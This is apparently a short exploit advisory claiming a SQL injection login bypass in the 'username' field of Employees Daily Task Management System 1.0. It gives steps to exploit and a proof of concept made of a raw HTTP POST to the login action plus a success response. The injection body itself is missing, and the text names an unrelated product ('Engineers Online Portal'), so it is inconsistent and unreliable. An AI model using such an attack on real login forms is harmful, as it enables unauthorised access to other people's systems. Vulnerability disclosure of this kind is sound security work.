# Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass  
# Exploit Author: able403  
# Date: 08/12/2021  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: windows 10   
# Vulnerable page: Actions.php  
# VUlnerable parameters: "username"  
Technical description:  
An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication.  
Steps to exploit:  
1) Navigate to http://localhost/login.php  
2) Insert your payload in the user or password field   
3) Click login  
Proof of concept (Poc):  
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form -   
POST /Actions.php?a=employee_login HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 43  
Connection: close  
Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl  
HTTP/1.1 200 OK  
Date: Wed, 10 Nov 2021 02:23:38 GMT  
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02  
X-Powered-By: PHP/8.0.2  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 48  
{"status":"success","msg":"Login successfully."}